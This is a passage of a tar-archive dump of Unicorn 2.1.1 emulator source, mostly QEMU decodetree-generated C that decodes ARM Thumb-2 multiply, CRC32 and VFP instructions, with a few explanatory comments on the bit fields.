*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:590 */ if (trans_UHSAX(ctx, &u.f_rrr)) return true; return false; } return false; case 0x0080f080: /* 11111010 1....... 1111.... 10...... */ switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:262 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QADD(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:264 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDADD(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:263 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QSUB(ctx, &u.f_rrr)) return true; return false; case 0x00000030: /* 11111010 1000.... 1111.... 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:265 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDSUB(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:277 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REV(ctx, &u.f_rr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:278 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REV16(ctx, &u.f_rr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:279 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_RBIT(ctx, &u.f_rr)) return true; return false; case 0x00100030: /* 11111010 1001.... 1111.... 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:280 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_REVSH(ctx, &u.f_rr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:274 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_SEL(ctx, &u.f_rrr)) return true; return false; case 0x00300000: /* 11111010 1011.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:281 */ disas_t32_extract_rdm(ctx, &u.f_rr, insn); if (trans_CLZ(ctx, &u.f_rr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:267 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32B(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:268 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32H(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 1010.... 
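   [annotation: for the CRC32 rows, insn[5:4] encodes the operand size
    (B, H, W) and bit 20 selects the CRC32C variants, which use the
    Castagnoli polynomial]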
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:269 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32W(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:270 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CB(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:271 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CH(ctx, &u.f_rrr)) return true; return false; case 0x00500020: /* 11111010 1101.... 1111.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:272 */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_CRC32CW(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x3: /* 11111011 ........ ........ ........ */ switch (insn & 0x00f000f0) { case 0x00000000: /* 11111011 0000.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0000.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:201 */ disas_t32_extract_s0_rn0dm(ctx, &u.f_s_rrrr, insn); if (trans_MUL(ctx, &u.f_s_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:202 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_MLA(ctx, &u.f_s_rrrr)) return true; return false; case 0x00000010: /* 11111011 0000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:204 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_MLS(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* 11111011 0001.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:219 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULBB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:220 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLABB(ctx, &u.f_rrrr)) return true; return false; case 0x00100010: /* 11111011 0001.... ........ 0001.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:223 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULBT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:224 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLABT(ctx, &u.f_rrrr)) return true; return false; case 0x00100020: /* 11111011 0001.... ........ 0010.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:227 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULTB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:228 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLATB(ctx, &u.f_rrrr)) return true; return false; case 0x00100030: /* 11111011 0001.... ........ 
0011.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0001.... 1111.... 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:231 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULTT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:232 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLATT(ctx, &u.f_rrrr)) return true; return false; case 0x00200000: /* 11111011 0010.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:242 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAD(ctx, &u.f_rrrr)) return true; return false; case 0x00200010: /* 11111011 0010.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:243 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLADX(ctx, &u.f_rrrr)) return true; return false; case 0x00300000: /* 11111011 0011.... ........ 0000.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0011.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:211 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULWB(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:212 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAWB(ctx, &u.f_rrrr)) return true; return false; case 0x00300010: /* 11111011 0011.... ........ 0001.... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111011 0011.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:215 */ disas_t32_extract_rn0dm(ctx, &u.f_rrrr, insn); if (trans_SMULWT(ctx, &u.f_rrrr)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:216 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLAWT(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* 11111011 0100.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:244 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSD(ctx, &u.f_rrrr)) return true; return false; case 0x00400010: /* 11111011 0100.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:245 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSDX(ctx, &u.f_rrrr)) return true; return false; case 0x00500000: /* 11111011 0101.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:252 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLA(ctx, &u.f_rrrr)) return true; return false; case 0x00500010: /* 11111011 0101.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:253 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLAR(ctx, &u.f_rrrr)) return true; return false; case 0x00600000: /* 11111011 0110.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:254 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLS(ctx, &u.f_rrrr)) return true; return false; case 0x00600010: /* 11111011 0110.... ........ 0001.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:255 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMMLSR(ctx, &u.f_rrrr)) return true; return false; case 0x00700000: /* 11111011 0111.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:240 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_USADA8(ctx, &u.f_rrrr)) return true; return false; case 0x00800000: /* 11111011 1000.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:205 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_SMULL(ctx, &u.f_s_rrrr)) return true; return false; case 0x009000f0: /* 11111011 1001.... ........ 1111.... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* 11111011 1001.... 1111.... 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:257 */ if (trans_SDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00a00000: /* 11111011 1010.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:206 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_UMULL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00b000f0: /* 11111011 1011.... ........ 1111.... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* 11111011 1011.... 1111.... 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:258 */ if (trans_UDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00c00000: /* 11111011 1100.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:207 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_SMLAL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00c00080: /* 11111011 1100.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:234 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALBB(ctx, &u.f_rrrr)) return true; return false; case 0x00c00090: /* 11111011 1100.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:235 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALBT(ctx, &u.f_rrrr)) return true; return false; case 0x00c000a0: /* 11111011 1100.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:236 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALTB(ctx, &u.f_rrrr)) return true; return false; case 0x00c000b0: /* 11111011 1100.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:237 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALTT(ctx, &u.f_rrrr)) return true; return false; case 0x00c000c0: /* 11111011 1100.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:247 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALD(ctx, &u.f_rrrr)) return true; return false; case 0x00c000d0: /* 11111011 1100.... ........ 1101.... 
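(SMLALDX: signed multiply accumulate long dual, with the second operand pair exchanged; a 64-bit accumulating form, hence the four-register rnadm extractor)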
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:248 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLALDX(ctx, &u.f_rrrr)) return true; return false; case 0x00d000c0: /* 11111011 1101.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:249 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSLD(ctx, &u.f_rrrr)) return true; return false; case 0x00d000d0: /* 11111011 1101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:250 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_SMLSLDX(ctx, &u.f_rrrr)) return true; return false; case 0x00e00000: /* 11111011 1110.... ........ 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:208 */ disas_t32_extract_s0_rnadm(ctx, &u.f_s_rrrr, insn); if (trans_UMLAL(ctx, &u.f_s_rrrr)) return true; return false; case 0x00e00060: /* 11111011 1110.... ........ 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:209 */ disas_t32_extract_rnadm(ctx, &u.f_rrrr, insn); if (trans_UMAAL(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; } return false; } return false; } unicorn-2.1.1/qemu/target/arm/decode-t32... wait
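   A note on the generated shape (summarizing the code below): disas_vfp_uncond()
   narrows the instruction through nested switches on (insn & mask); each case's
   bit-pattern comment shows the fixed bits, with '.' marking don't-care
   positions, and the path:line comment names the vfp-uncond.decode pattern that
   produced it. A matching case first runs a disas_vfp_uncond_extract_* helper
   to unpack the variable fields into the arg union, then calls the matching
   trans_* hook, which the including translator is expected to define.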
*/ typedef struct { int vd; int vm; int vn; } arg_disas_vfp_uncond0; typedef struct { int cc; int dp; int vd; int vm; int vn; } arg_disas_vfp_uncond1; typedef struct { int dp; int rm; int vd; int vm; } arg_disas_vfp_uncond2; typedef struct { int dp; int op; int rm; int vd; int vm; } arg_disas_vfp_uncond3; typedef arg_disas_vfp_uncond1 arg_VSEL; static bool trans_VSEL(DisasContext *ctx, arg_VSEL *a); typedef arg_disas_vfp_uncond0 arg_VMAXNM_sp; static bool trans_VMAXNM_sp(DisasContext *ctx, arg_VMAXNM_sp *a); typedef arg_disas_vfp_uncond0 arg_VMINNM_sp; static bool trans_VMINNM_sp(DisasContext *ctx, arg_VMINNM_sp *a); typedef arg_disas_vfp_uncond0 arg_VMAXNM_dp; static bool trans_VMAXNM_dp(DisasContext *ctx, arg_VMAXNM_dp *a); typedef arg_disas_vfp_uncond0 arg_VMINNM_dp; static bool trans_VMINNM_dp(DisasContext *ctx, arg_VMINNM_dp *a); typedef arg_disas_vfp_uncond2 arg_VRINT; static bool trans_VRINT(DisasContext *ctx, arg_VRINT *a); typedef arg_disas_vfp_uncond3 arg_VCVT; static bool trans_VCVT(DisasContext *ctx, arg_VCVT *a); static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_2(DisasContext *ctx, arg_disas_vfp_uncond1 *a, uint32_t insn) { a->cc = extract32(insn, 20, 2); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_3(DisasContext *ctx, arg_disas_vfp_uncond1 *a, uint32_t insn) { a->cc = extract32(insn, 20, 2); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->dp = 1; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_4(DisasContext *ctx, arg_disas_vfp_uncond2 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_5(DisasContext *ctx, arg_disas_vfp_uncond2 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->dp = 1; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_6(DisasContext *ctx, arg_disas_vfp_uncond3 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->op = extract32(insn, 7, 1); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 0; } static void disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_7(DisasContext *ctx, arg_disas_vfp_uncond3 *a, uint32_t insn) { a->rm = extract32(insn, 16, 2); a->op = extract32(insn, 7, 1); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->dp = 1; } static void disas_vfp_uncond_extract_vfp_dnm_d(DisasContext *ctx, arg_disas_vfp_uncond0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_uncond_extract_vfp_dnm_s(DisasContext *ctx, arg_disas_vfp_uncond0 *a, 
uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static bool disas_vfp_uncond(DisasContext *ctx, uint32_t insn) { union { arg_disas_vfp_uncond0 f_disas_vfp_uncond0; arg_disas_vfp_uncond1 f_disas_vfp_uncond1; arg_disas_vfp_uncond2 f_disas_vfp_uncond2; arg_disas_vfp_uncond3 f_disas_vfp_uncond3; } u; switch (insn & 0xff800f50) { case 0xfe000a00: /* 11111110 0....... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:47 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_2(ctx, &u.f_disas_vfp_uncond1, insn); if (trans_VSEL(ctx, &u.f_disas_vfp_uncond1)) return true; return false; case 0xfe000b00: /* 11111110 0....... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:49 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_3(ctx, &u.f_disas_vfp_uncond1, insn); if (trans_VSEL(ctx, &u.f_disas_vfp_uncond1)) return true; return false; case 0xfe800a00: /* 11111110 1....... ....1010 .0.0.... */ disas_vfp_uncond_extract_vfp_dnm_s(ctx, &u.f_disas_vfp_uncond0, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:52 */ if (trans_VMAXNM_sp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; } return false; case 0xfe800a40: /* 11111110 1....... ....1010 .1.0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:53 */ disas_vfp_uncond_extract_vfp_dnm_s(ctx, &u.f_disas_vfp_uncond0, insn); if (trans_VMINNM_sp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; case 0x3: /* 11111110 1.11.... ....1010 .1.0.... */ switch ((insn >> 18) & 0x3) { case 0x2: /* 11111110 1.1110.. ....1010 .1.0.... */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_4(ctx, &u.f_disas_vfp_uncond2, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* 11111110 1.1110.. ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:58 */ if (trans_VRINT(ctx, &u.f_disas_vfp_uncond2)) return true; return false; } return false; case 0x3: /* 11111110 1.1111.. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:64 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_6(ctx, &u.f_disas_vfp_uncond3, insn); if (trans_VCVT(ctx, &u.f_disas_vfp_uncond3)) return true; return false; } return false; } return false; case 0xfe800b00: /* 11111110 1....... ....1011 .0.0.... */ disas_vfp_uncond_extract_vfp_dnm_d(ctx, &u.f_disas_vfp_uncond0, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:55 */ if (trans_VMAXNM_dp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; } return false; case 0xfe800b40: /* 11111110 1....... ....1011 .1.0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1011 .1.0.... 
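(VMINNM_dp: the IEEE 754-2008 minNum operation on double-precision registers)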
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:56 */ disas_vfp_uncond_extract_vfp_dnm_d(ctx, &u.f_disas_vfp_uncond0, insn); if (trans_VMINNM_dp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; case 0x3: /* 11111110 1.11.... ....1011 .1.0.... */ switch ((insn >> 18) & 0x3) { case 0x2: /* 11111110 1.1110.. ....1011 .1.0.... */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_5(ctx, &u.f_disas_vfp_uncond2, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* 11111110 1.1110.. ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:60 */ if (trans_VRINT(ctx, &u.f_disas_vfp_uncond2)) return true; return false; } return false; case 0x3: /* 11111110 1.1111.. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:66 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_7(ctx, &u.f_disas_vfp_uncond3, insn); if (trans_VCVT(ctx, &u.f_disas_vfp_uncond3)) return true; return false; } return false; } return false; } return false; } unicorn-2.1.1/qemu/target/arm/decode-vfp.inc.c000066400000000000000000000160765146752410670021157 0ustar00rootroot00000000000000/* This file is autogenerated by scripts/decodetree.py. 
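   A note on the register fields (summarizing the extract helpers below): VFP
   register numbers are stored split across the instruction, and the helpers
   reassemble them with extract32/deposit32. A single-precision index is Vd:D,
   i.e. bits [15:12] shifted left by one with bit 22 as the low bit, so for
   example
       vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4));
   while a double-precision index is D:Vd, with bit 22 deposited above bits
   [15:12]. The Vn and Vm operand fields follow the same scheme.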
*/ typedef struct { int vd; int vm; int vn; } arg_disas_vfp0; typedef struct { int vd; int vm; } arg_disas_vfp1; typedef struct { int imm; int vd; } arg_disas_vfp10; typedef struct { int e; int vd; int vm; int z; } arg_disas_vfp11; typedef struct { int t; int vd; int vm; } arg_disas_vfp12; typedef struct { int s; int vd; int vm; } arg_disas_vfp13; typedef struct { int imm; int opc; int vd; } arg_disas_vfp14; typedef struct { int rz; int s; int vd; int vm; } arg_disas_vfp15; typedef struct { int l; int rn; } arg_disas_vfp16; typedef struct { int index; int rt; int size; int u; int vn; } arg_disas_vfp2; typedef struct { int index; int rt; int size; int vn; } arg_disas_vfp3; typedef struct { int b; int e; int q; int rt; int vn; } arg_disas_vfp4; typedef struct { int l; int reg; int rt; } arg_disas_vfp5; typedef struct { int l; int rt; int vn; } arg_disas_vfp6; typedef struct { int op; int rt; int rt2; int vm; } arg_disas_vfp7; typedef struct { int imm; int l; int rn; int u; int vd; } arg_disas_vfp8; typedef struct { int imm; int l; int p; int rn; int u; int vd; int w; } arg_disas_vfp9; typedef arg_disas_vfp2 arg_VMOV_to_gp; static bool trans_VMOV_to_gp(DisasContext *ctx, arg_VMOV_to_gp *a); typedef arg_disas_vfp3 arg_VMOV_from_gp; static bool trans_VMOV_from_gp(DisasContext *ctx, arg_VMOV_from_gp *a); typedef arg_disas_vfp4 arg_VDUP; static bool trans_VDUP(DisasContext *ctx, arg_VDUP *a); typedef arg_disas_vfp5 arg_VMSR_VMRS; static bool trans_VMSR_VMRS(DisasContext 